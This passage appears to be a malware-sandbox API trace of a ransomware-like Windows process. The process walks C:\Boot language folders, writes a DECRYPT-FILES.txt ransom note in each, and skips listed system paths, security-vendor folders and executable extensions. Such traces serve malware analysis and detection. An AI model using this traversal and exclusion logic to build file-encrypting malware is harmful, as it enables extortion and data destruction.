lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.255] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0071.255] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.255] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\hu-HU\\\\jkbimi8.tmp") returned 26 [0071.255] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\\\jkbimi8.tmp" (normalized: "c:\\boot\\hu-hu\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.256] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0071.256] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.256] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\hu-HU\\\\DECRYPT-FILES.txt") returned 32 [0071.256] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\hu-hu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.256] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.257] CloseHandle (hObject=0x424) returned 1 [0071.257] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0071.257] lstrcatW (in: lpString1="C:\\Boot\\hu-HU\\", lpString2="*" | out: lpString1="C:\\Boot\\hu-HU\\*") returned="C:\\Boot\\hu-HU\\*" [0071.257] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.257] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.257] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.258] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.258] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.258] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.258] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.258] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.258] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.258] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.258] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.258] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0071.258] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.258] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\hu-HU\\" | out: lpString1="C:\\Boot\\hu-HU\\") returned="C:\\Boot\\hu-HU\\" [0071.258] lstrcatW (in: lpString1="C:\\Boot\\hu-HU\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned="C:\\Boot\\hu-HU\\bootmgr.exe.mui" [0071.258] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.258] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.258] CloseHandle (hObject=0x0) returned 0 [0071.258] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.259] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.259] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.259] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.259] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.259] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.259] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.259] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.259] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.259] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.259] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0071.259] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.259] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\hu-HU\\" | out: lpString1="C:\\Boot\\hu-HU\\") returned="C:\\Boot\\hu-HU\\" [0071.259] lstrcatW (in: lpString1="C:\\Boot\\hu-HU\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\hu-HU\\jkbimi8.tmp") returned="C:\\Boot\\hu-HU\\jkbimi8.tmp" [0071.259] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.260] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\jkbimi8.tmp" (normalized: "c:\\boot\\hu-hu\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.260] CloseHandle (hObject=0x0) returned 0 [0071.260] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.260] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.260] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.260] CloseHandle (hObject=0x420) returned 1 [0071.260] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0071.260] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0071.260] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0071.260] lstrcatW (in: lpString1="it-IT", lpString2="\\" | out: lpString1="it-IT\\") returned="it-IT\\" [0071.260] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="it-IT\\" | out: lpString1="C:\\Boot\\it-IT\\") returned="C:\\Boot\\it-IT\\" [0071.260] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Program Files") returned 0x0 [0071.260] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch=":\\Windows") returned 0x0 [0071.260] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Games\\") returned 0x0 [0071.260] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.260] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.260] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.260] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.261] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.261] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\All Users") returned 0x0 [0071.261] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.261] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.261] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.261] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="AhnLab") returned 0x0 [0071.261] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.261] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0071.261] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.261] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\it-IT\\\\jkbimi8.tmp") returned 26 [0071.261] CreateFileW (lpFileName="C:\\Boot\\it-IT\\\\jkbimi8.tmp" (normalized: "c:\\boot\\it-it\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.262] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0071.262] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.262] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\it-IT\\\\DECRYPT-FILES.txt") returned 32 [0071.262] CreateFileW (lpFileName="C:\\Boot\\it-IT\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\it-it\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.262] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.263] CloseHandle (hObject=0x424) returned 1 [0071.263] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0071.263] lstrcatW (in: lpString1="C:\\Boot\\it-IT\\", lpString2="*" | out: lpString1="C:\\Boot\\it-IT\\*") returned="C:\\Boot\\it-IT\\*" [0071.263] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.264] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.264] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.264] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.264] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.264] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.264] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.264] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.264] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.264] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0071.264] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.264] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\it-IT\\" | out: lpString1="C:\\Boot\\it-IT\\") returned="C:\\Boot\\it-IT\\" [0071.264] lstrcatW (in: lpString1="C:\\Boot\\it-IT\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned="C:\\Boot\\it-IT\\bootmgr.exe.mui" [0071.264] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.264] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.265] CloseHandle (hObject=0x0) returned 0 [0071.265] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.265] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.265] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.265] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.265] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.265] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.265] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.265] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.265] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.265] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.265] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0071.265] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.265] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\it-IT\\" | out: lpString1="C:\\Boot\\it-IT\\") returned="C:\\Boot\\it-IT\\" [0071.265] lstrcatW (in: lpString1="C:\\Boot\\it-IT\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\it-IT\\jkbimi8.tmp") returned="C:\\Boot\\it-IT\\jkbimi8.tmp" [0071.265] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.266] CreateFileW (lpFileName="C:\\Boot\\it-IT\\jkbimi8.tmp" (normalized: "c:\\boot\\it-it\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.266] CloseHandle (hObject=0x0) returned 0 [0071.266] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.266] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.266] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.266] CloseHandle (hObject=0x420) returned 1 [0071.266] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0071.266] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0071.266] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0071.266] lstrcatW (in: lpString1="ja-JP", lpString2="\\" | out: lpString1="ja-JP\\") returned="ja-JP\\" [0071.266] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ja-JP\\" | out: lpString1="C:\\Boot\\ja-JP\\") returned="C:\\Boot\\ja-JP\\" [0071.266] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Program Files") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch=":\\Windows") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Games\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\All Users") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="AhnLab") returned 0x0 [0071.267] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.267] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0071.267] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.267] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\ja-JP\\\\jkbimi8.tmp") returned 26 [0071.267] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\\\jkbimi8.tmp" (normalized: "c:\\boot\\ja-jp\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.267] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0071.267] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.267] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\ja-JP\\\\DECRYPT-FILES.txt") returned 32 [0071.267] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\ja-jp\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.268] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.269] CloseHandle (hObject=0x424) returned 1 [0071.269] lstrlenW 